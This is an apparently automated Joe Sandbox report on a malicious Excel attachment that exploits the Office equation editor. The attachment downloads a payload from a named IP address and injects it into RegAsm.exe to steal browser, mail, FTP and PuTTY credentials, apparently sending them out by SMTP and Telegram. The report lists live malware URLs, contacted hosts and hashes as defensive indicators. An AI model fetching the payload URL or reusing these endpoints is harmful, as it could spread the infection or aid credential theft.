                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection212Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information21Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing2Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading111NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion13LSA SecretsVirtualization/Sandbox Evasion13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection212Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 321163 Sample: Bill # 2.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Antivirus detection for URL or domain 2->43 45 13 other signatures 2->45 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 17 2->12         started        process3 dnsIp4 37 198.23.212.152, 49167, 80 AS-COLOCROSSINGUS United States 7->37 25 C:\Users\user\AppData\Local\...\tochi[1].exe, PE32 7->25 dropped 27 C:\Users\Public\vbc.exe, PE32 7->27 dropped 59 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->59 14 vbc.exe 7->14         started        29 C:\Users\user\Desktop\~$Bill # 2.xlsx, data 12->29 dropped file5 signatures6 process7 signatures8 61 Machine Learning detection for dropped file 14->61 63 Writes to foreign memory regions 14->63 65 Maps a DLL or memory area into another process 14->65 17 RegAsm.exe 12 4 14->17         started        21 RegAsm.exe 14->21         started        23 RegAsm.exe 14->23         started        process9 dnsIp10 31 elb097307-934924932.us-east-1.elb.amazonaws.com 23.21.42.25, 443, 49168 AMAZON-AESUS United States 17->31 33 us2.smtp.mailhostbox.com 17->33 35 2 other IPs or domains 17->35 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->47 49 Tries to steal Mail credentials (via file access) 17->49 51 Tries to harvest and steal ftp login credentials 17->51 53 Tries to harvest and steal browser information (history, passwords, etc) 17->53 55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 21->57 signatures11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Bill # 2.xlsx31%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\Public\vbc.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe100%Joe Sandbox ML

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                4.2.vbc.exe.460000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                7.2.RegAsm.exe.400000.2.unpack100%AviraHEUR/AGEN.1138205Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                http://DynDns.comDynDNS0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                http://198.23.212.152/doc/tochi.exe100%Avira URL Cloudmalware
                http://VaMNef.com0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://ns.a0%Avira URL Cloudsafe
                https://AkXBTiOq5oAkuzK9T5L.org0%Avira URL Cloudsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                https://api.ipify.orgP0%Avira URL Cloudsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                elb097307-934924932.us-east-1.elb.amazonaws.com
                23.21.42.25
                truefalse
                  high
                  us2.smtp.mailhostbox.com
                  208.91.198.143
                  truefalse
                    high
                    api.ipify.org
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://198.23.212.152/doc/tochi.exetrue
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpfalse
                        high
                        http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSRegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/server1.crl0RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                          high
                          http://us2.smtp.mailhostbox.comRegAsm.exe, 00000007.00000002.2360976971.0000000002A96000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://ocsp.entrust.net03RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://VaMNef.comRegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.diginotar.nl/cps/pkioverheid0RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://elb097307-934924932.us-east-1.elb.amazonaws.comRegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpfalse
                              high
                              http://ns.avbc.exe, 00000004.00000003.2167387608.0000000004C74000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://AkXBTiOq5oAkuzK9T5L.orgRegAsm.exe, 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://api.ipify.orgGETMozilla/5.0RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://api.ipify.orgRegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpfalse
                                high
                                https://api.ipify.orgRegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmpfalse
                                  high
                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpfalse
                                    high
                                    https://api.telegram.org/bot%telegramapi%/vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpfalse
                                      high
                                      https://api.ipify.orgPRegAsm.exe, 00000007.00000002.2360835164.00000000029D8000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.%s.comPARegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      low
                                      http://ocsp.entrust.net0DRegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpfalse
                                        high
                                        https://secure.comodo.com/CPS0RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                                          high
                                          https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xRegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpfalse
                                            high
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://servername/isapibackend.dllRegAsm.exe, 00000007.00000002.2362741103.00000000067C0000.00000002.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://crl.entrust.net/2048ca.crl0RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpfalse
                                              high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              23.21.42.25
                                              unknownUnited States
                                              14618AMAZON-AESUSfalse
                                              198.23.212.152
                                              unknownUnited States
                                              36352AS-COLOCROSSINGUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:321163
                                              Start date:20.11.2020
                                              Start time:13:46:20
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 6m 22s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Bill # 2.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winXLSX@10/10@3/2
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 5.9% (good quality ratio 5.2%)
                                              • Quality average: 53.8%
                                              • Quality standard deviation: 27.4%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 8.241.122.126, 8.241.9.126, 8.248.147.254, 8.253.95.121, 8.253.204.120
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              13:47:04API Interceptor131x Sleep call for process: EQNEDT32.EXE modified
                                              13:47:09API Interceptor44x Sleep call for process: vbc.exe modified
                                              13:47:18API Interceptor1125x Sleep call for process: RegAsm.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              23.21.42.25908.exeGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              0Oen62zpot.exeGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              Catalogue.exeGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              zMhsjuuCLk.exeGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              198.23.212.152RFQ_SMKM19112020.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.152/doc/topo.exe
                                              Payment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.152/doc/ogo.exe
                                              PI_SMK18112020.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.152/doc/mrtop.exe
                                              Purchase Order RFQ-HL51L07.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.152/doc/friend.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              us2.smtp.mailhostbox.comPO1.xlsxGet hashmaliciousBrowse
                                              • 208.91.199.223
                                              QKLQkaCe9M.exeGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              0hgHwEkIWY.exeGet hashmaliciousBrowse
                                              • 208.91.198.143
                                              Swift Copy.exeGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              Shipping Details_PDF.exeGet hashmaliciousBrowse
                                              • 208.91.199.225
                                              RFQ_SMKM19112020.xlsxGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              Order List.xlsxGet hashmaliciousBrowse
                                              • 208.91.199.225
                                              Shipping doc.pdf.exeGet hashmaliciousBrowse
                                              • 208.91.198.143
                                              OrV86zxFWHW1j0f.exeGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              XDMBhLJxD1Qf7JW.exeGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              me4qssWAMQ.exeGet hashmaliciousBrowse
                                              • 208.91.199.225
                                              Vd58qg0dhp.exeGet hashmaliciousBrowse
                                              • 208.91.199.223
                                              15egpuWfT3.exeGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              Shipping Details.exeGet hashmaliciousBrowse
                                              • 208.91.198.143
                                              Wrong Transfer Payment - Chk Clip Copy.exeGet hashmaliciousBrowse
                                              • 208.91.199.223
                                              WireTransfer Copy767.exeGet hashmaliciousBrowse
                                              • 208.91.199.225
                                              DOH0003675550.pdf.exeGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              aviso de remesas_pdf__________________________________________.exeGet hashmaliciousBrowse
                                              • 208.91.199.224
                                              Doc.exeGet hashmaliciousBrowse
                                              • 208.91.199.223
                                              SWIFT.exeGet hashmaliciousBrowse
                                              • 208.91.199.223
                                              elb097307-934924932.us-east-1.elb.amazonaws.comPO1.xlsxGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              a7UZzCVWKO.exeGet hashmaliciousBrowse
                                              • 54.204.14.42
                                              QKLQkaCe9M.exeGet hashmaliciousBrowse
                                              • 50.19.252.36
                                              sAPuJAvs52.exeGet hashmaliciousBrowse
                                              • 54.243.161.145
                                              JlgyVmPWZr.exeGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              EIUOzWW2JX.exeGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              RVAgYSH2qh.exeGet hashmaliciousBrowse
                                              • 54.235.142.93
                                              yCyc4rN0u8.exeGet hashmaliciousBrowse
                                              • 54.235.83.248
                                              9cXAnovmQX.exeGet hashmaliciousBrowse
                                              • 54.225.66.103
                                              T2HDck1Mmy.exeGet hashmaliciousBrowse
                                              • 54.235.142.93
                                              Purchase Order.exeGet hashmaliciousBrowse
                                              • 54.225.66.103
                                              Payment Advice Note from 19.11.2020.exeGet hashmaliciousBrowse
                                              • 23.21.126.66
                                              phy__1__31629__2649094674__1605642612.exeGet hashmaliciousBrowse
                                              • 23.21.126.66
                                              BBVA confirming Aviso de pago Eur5780201120.exeGet hashmaliciousBrowse
                                              • 54.204.14.42
                                              Ejgvvuwuu8.exeGet hashmaliciousBrowse
                                              • 54.225.169.28
                                              PO N0.1500243224._PDF.exeGet hashmaliciousBrowse
                                              • 54.204.14.42
                                              Avion Quotation Request.docGet hashmaliciousBrowse
                                              • 54.204.14.42
                                              zRHI9DJ0YKIPfBX.exeGet hashmaliciousBrowse
                                              • 54.235.182.194
                                              {REQUEST FOR QUOTATION-local lot.1,2,3,4,6container..exeGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              chib(1).exeGet hashmaliciousBrowse
                                              • 54.225.153.147

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AMAZON-AESUShttps://ubereats.app.link/cwmLFZfMz5?%243p=a_custom_354088&%24deeplink_path=promo%2Fapply%3FpromoCode%3DRECONFORT7&%24desktop_url=tracking.spectrumemp.com/el?aid=8feeb968-bdd0-11e8-b27f-22000be0a14e&rid=50048635&pid=285843&cid=513&dest=overlordscan.com/cmV0by5tZXR6bGVyQGlzb2x1dGlvbnMuY2g=%23#kkowfocjoyuynaip#Get hashmaliciousBrowse
                                              • 35.170.181.205
                                              BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                              • 107.22.223.163
                                              PO1.xlsxGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              https://rebrand.ly/zkp0yGet hashmaliciousBrowse
                                              • 54.227.164.140
                                              AccountStatements.htmlGet hashmaliciousBrowse
                                              • 18.209.113.162
                                              a7UZzCVWKO.exeGet hashmaliciousBrowse
                                              • 54.204.14.42
                                              QKLQkaCe9M.exeGet hashmaliciousBrowse
                                              • 50.19.252.36
                                              sAPuJAvs52.exeGet hashmaliciousBrowse
                                              • 54.243.161.145
                                              JlgyVmPWZr.exeGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              EIUOzWW2JX.exeGet hashmaliciousBrowse
                                              • 174.129.214.20
                                              RVAgYSH2qh.exeGet hashmaliciousBrowse
                                              • 54.235.142.93
                                              yCyc4rN0u8.exeGet hashmaliciousBrowse
                                              • 54.235.83.248
                                              9cXAnovmQX.exeGet hashmaliciousBrowse
                                              • 54.225.66.103
                                              T2HDck1Mmy.exeGet hashmaliciousBrowse
                                              • 54.235.142.93
                                              Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                              • 52.71.133.130
                                              Payment Advice Note from 19.11.2020.exeGet hashmaliciousBrowse
                                              • 23.21.126.66
                                              phy__1__31629__2649094674__1605642612.exeGet hashmaliciousBrowse
                                              • 23.21.126.66
                                              BBVA confirming Aviso de pago Eur5780201120.exeGet hashmaliciousBrowse
                                              • 50.19.252.36
                                              Ejgvvuwuu8.exeGet hashmaliciousBrowse
                                              • 54.225.169.28
                                              PO N0.1500243224._PDF.exeGet hashmaliciousBrowse
                                              • 54.204.14.42
                                              AS-COLOCROSSINGUSOrder List.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.188
                                              PO1.xlsxGet hashmaliciousBrowse
                                              • 192.3.141.160
                                              document.docGet hashmaliciousBrowse
                                              • 192.210.214.139
                                              Financial draft.xlsxGet hashmaliciousBrowse
                                              • 192.210.214.146
                                              RFQ_SMKM19112020.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.152
                                              Payment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.152
                                              Order List.xlsxGet hashmaliciousBrowse
                                              • 198.23.213.57
                                              PI_SMK18112020.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.152
                                              y5y4LzZPCE.exeGet hashmaliciousBrowse
                                              • 192.210.214.146
                                              8pSlNVws0a.exeGet hashmaliciousBrowse
                                              • 192.210.214.146
                                              PaymentNOV+2020.xlsxGet hashmaliciousBrowse
                                              • 192.210.214.146
                                              https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                              • 198.23.213.236
                                              Finance Draft COO.xlsxGet hashmaliciousBrowse
                                              • 192.210.214.146
                                              https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                              • 198.23.213.236
                                              https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                              • 198.23.213.236
                                              https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                              • 198.23.213.236
                                              ShippingDoc.jarGet hashmaliciousBrowse
                                              • 198.46.141.66
                                              baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                              • 198.46.134.245
                                              https://bremen.com.ve/TDS/ofc1Get hashmaliciousBrowse
                                              • 192.210.150.19
                                              Order List.xlsxGet hashmaliciousBrowse
                                              • 75.127.1.225

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              36f7277af969a6947a61ae0b815907a1PO1.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              RFQ_SMKM19112020.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Payment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Order List.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              6021557.xlsGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Order List.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              PO-4806125050.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              6266715850.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Quote Request.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Order_Request_Retail_20-11691-AB.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              pgknUuXJCT.rtfGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Order BS0098765.xlsxGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              VESSEL CONTACT DETAILS.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              MB SHIPPING PDA TEMPLATE.xlsmGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              VESSEL DETAILS.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              SHIP#UfffdS PARTICULAR.xlsmGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              BUNGE OPS.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              #4725162.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Quote Request October-2020.xlsGet hashmaliciousBrowse
                                              • 23.21.42.25

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58936
                                              Entropy (8bit):7.994797855729196
                                              Encrypted:true
                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
